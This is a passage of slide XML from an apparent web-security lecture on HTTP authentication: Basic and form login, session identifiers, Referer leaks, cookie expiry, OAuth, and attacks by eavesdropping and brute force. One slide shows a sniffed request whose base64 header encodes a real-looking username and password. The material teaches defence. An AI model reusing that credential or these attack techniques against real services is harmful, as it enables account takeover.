              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The client retries the access including in the header a field containing a cookie composed of base64 encoded username and password</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-GB" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Authorization: Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ== </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2049123378"/>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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Form-based Authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="915459" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A form is used to send username and password (over a TLS-protected channel) to a server-side application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The application: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Verifies the credentials (e.g., by checking a back-end database)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Generates a session authenticator which is sent back to the user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Typically, a cookie, which is sent as part of the header, e.g.:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Set-Cookie: auth=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>john:bluedog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”; secure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Next time the browser contacts the same server it will include the authenticator</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In the case of cookies, the request will contain, for example:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cookie: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>auth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>john:bluedog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Authentication is performed using this value</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="138963807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83" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Better Authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="920584" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Notes on previous scheme:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Authenticators should not have predictable values</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Authenticators should not be reusable across sessions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A better form of authentication is to generate a random value and store it with other session information in a file or back-end database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This can be automatically done using “sessions” in various frameworks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="is-IS" dirty="0"/>
              <a:t>J2EE: JSESSIONID=1A530637289A03B07199A44E8D531429</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PHP: PHPSESSID=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>43b4a19d1962304012a7531fb2bc50dd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ASP.NET: ASPSESSIONID=MBHHDGCBGGBJBMAEGLDAJLGF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3397513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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Authentication Caveats</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="921603" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If an application includes an authenticator in the URL it is possible that browsers may leak the information as part of the “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” [sic!] field</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User access page http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.foo.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>links.php?auth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=28919830983</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User selects a link to http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.bar.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.bar.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> site receives:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>GET / HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Host: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>www.bar.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>User-Agent: Mozilla</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>: http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>www.foo.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>links.php?auth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>=28919830983</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1493613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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>More Caveats</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="922627" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Authenticators should not be long-lived</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Note that a cookie’s expiration date is enforced by the browser and not by the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An attacker can manually modify the files where cookies are stored to prolong a cookie’s lifetime</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Expiration information should be stored on the server’s side or included in the cookie in a cryptographically secure way</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31909349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Single Sign-On</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Authentication management can be a difficult task</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It is possible to rely on trusted third parties for authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>OAuth</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>OpenId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (uses OAuth to implement authentication) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SAML</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>FIDO</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19497949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B25C-32EC-A0D7-6D72-61A8ABB1FE6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OAuth 2.0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3826E299-2591-002B-E6AF-F5A2D2B3EED0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Client application: The website who wants to access some user information managed by a different service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The resource owner: The user who owns the data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The service provider: The application that manages the user information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Process:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Client register with the service provider (once)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Client ask the provider for access to some user data (scope)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The user is asked to log into the provider and give permission to the client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The client receives a token which is used to access to the user data by using API calls to the service provider</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4730234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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Attacking Authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="923651" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Eavesdropping credentials/authenticators</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Brute-forcing/guessing credentials/authenticators</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Session Fixation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OAuth Implementation issues </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="267119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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>URI Syntax</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="846851" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Scheme: a string specifying the protocol/framework</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Authority: a name space that qualifies the resource</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Most of the times, it is a server name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>userinfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>&gt;@&lt;host&gt;:&lt;port&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Path: a pathname composed of “/” separated strings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Query: an application-specific piece of information</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="838642117"/>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p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Eavesdropping Credentials</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="925699" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If the HTTP connection is not protected by TLS it is possible to eavesdrop the credentials:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Username and password sent as part of an HTTP basic authentication exchange</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>05/12/05 11:03:11 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> 253.2.19.172.in-addr.arpa.61312 -&gt;                   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>this.cs.ucdavis.edu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> 80 (http)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>       GET /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>webreview</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/ HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>       Host: raid2005.cs.ucdavis.edu</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>       Authorization: Basic cmFpZGNoYWlyOnRvcDY4OQ== [raidchair:top688]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Username and password submitted through a form</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The authenticator included as cookie, URL parameter, or hidden field in a form</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cookies’ “secure” flag is a good way to prevent accidental leaking of sensitive authentication information</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="179278333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p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Brute-forcing Credentials</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="929795" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If authenticators have a limited possible set of values, they can be brute-forced (e.g., 4-digit PIN)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If authenticators are chosen in a non-random way they can be easily guessed </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sequential session IDs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User-specified passwords </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.foo.bar</a:t>
            </a:r>
            <a:r>
